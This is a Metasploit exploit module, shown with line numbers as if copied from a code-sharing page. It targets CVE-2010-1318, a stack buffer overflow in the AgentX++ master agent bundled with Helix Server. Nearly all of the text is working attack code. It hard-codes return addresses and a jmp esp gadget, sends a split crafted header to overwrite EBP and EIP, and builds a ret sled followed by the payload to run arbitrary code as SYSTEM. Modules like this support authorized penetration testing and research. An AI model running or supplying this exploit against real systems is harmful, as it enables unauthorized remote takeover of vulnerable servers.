Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  #include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow',
15
      'Description'    => %q{
16
          This exploits a stack buffer overflow in the AgentX++ library, as used by
17
        various applications. By sending a specially crafted request, an attacker can
18
        execute arbitrary code, potentially with SYSTEM privileges.
19

20
        This module was tested successfully against master.exe as included with Real
21
        Network\'s Helix Server v12. When installed as a service with Helix Server,
22
        the service runs as SYSTEM, has no recovery action, but will start automatically
23
        on boot.
24

25
        This module does not work with NX/XD enabled but could be modified easily to
26
        do so. The address
27
      },
28
      'Author'         => [ 'jduck' ],
29
      'License'        => MSF_LICENSE,
30
      'References'     =>
31
        [
32
          [ 'CVE', '2010-1318' ],
33
          [ 'OSVDB', '63919'],
34
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867' ]
35
        ],
36
      'Privileged'     => true,
37
      'DefaultOptions' =>
38
        {
39
          #'EXITFUNC' => 'seh',
40
        },
41
      'Payload'        =>
42
        {
43
          'Space'    => 1024,  # plenty of space
44
          'BadChars' => "",    # none!
45
          'DisableNops' => true,
46
          'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff"
47
        },
48
      'Platform'       => 'win',
49
      'Targets'        =>
50
        [
51
          [ 'Helix Server v12 and v13 - master.exe',
52
            {
53
              # The BufAddr varies :-/
54
              #'BufAddr' => 0xea3800,
55
              'BufAddr' => 0x1053880,
56
              'BufSize' => 25000,     # If this is too large, the buf is unmapped on free
57
              'Ret'     => 0x46664b,  # mov esp,ebp / pop ebp / ret in master.exe
58
              'JmpEsp'  => 0x7c3d55b7 # jmp esp from bundled msvcp71.dll
59
            }
60
          ]
61
        ],
62
      'DefaultTarget' => 0,
63
      'DisclosureDate' => '2010-04-16'))
64

65
    register_options([Opt::RPORT(705)])
66
  end
67

68
  def exploit
69
    print_status("Trying target #{target.name}...")
70

71
    connect
72
    print_status("Triggering the vulnerability... Cross your fingers!")
73

74
    num = target['BufSize']
75
    num_str = [num].pack('N')
76

77
    # First send 19 bytes to almost fill the buffer...
78
    hdr = ''
79
    hdr << [0x01, rand(256), 0x10 | rand(256), rand(256)].pack('CCCC')
80
    hdr << rand_text(16 - hdr.length)
81
    #hdr << "QQQQRRRRSSSS"
82
    hdr << num_str[0,3]
83
    sock.put(hdr)
84

85
    # Wait to make sure it processed that chunk.
86
    select(nil, nil, nil, 0.5)
87
    #print_status("press enter to trigger..."); x = $stdin.gets
88

89
    # Send the rest (smashed!)
90
    hdr = ''
91
    hdr << num_str[3,1]
92

93
    # NOTE: this stuff is extra, but doesn't count towards the payload..
94
    hdr << rand_text(8)
95
    #hdr << "EEEEFFFF"
96

97
    # becomes ebp
98
    #hdr << "\xeb" * 4
99
    base = target['BufAddr']
100
    new_ebp = base + (num / 2)
101
    if (mod4 = (num % 4)) > 0
102
      # align to 4 bytes
103
      new_ebp += (4 - mod4)
104
    end
105
    hdr << [new_ebp].pack('V')
106

107
    # becomes eip
108
    #hdr << "\xef\xbe\xad\xde"
109
    hdr << [target.ret].pack('V')
110

111
    # NOTE: sending more data will smash the low (up to 3) bytes of the socket handle -- no fun
112
    sock.put(hdr)
113

114
    # Send the data that we said we would...
115
    stack = []
116
    stack << target['JmpEsp']
117

118
    num_rets = (num - payload.encoded.length - 4) / 4
119
    num_rets.times {
120
      # points to ret instruction
121
      stack.unshift(target.ret + 3)
122
    }
123

124
    stack = stack.pack('V*')
125
    stack << payload.encoded
126
    # make sure we have all the bytes, or we wont reach the path we want.
127
    stack << rand_text(num - stack.length)
128

129
    sock.put(stack)
130

131
    handler
132
    disconnect
133
  end
134
end
135

136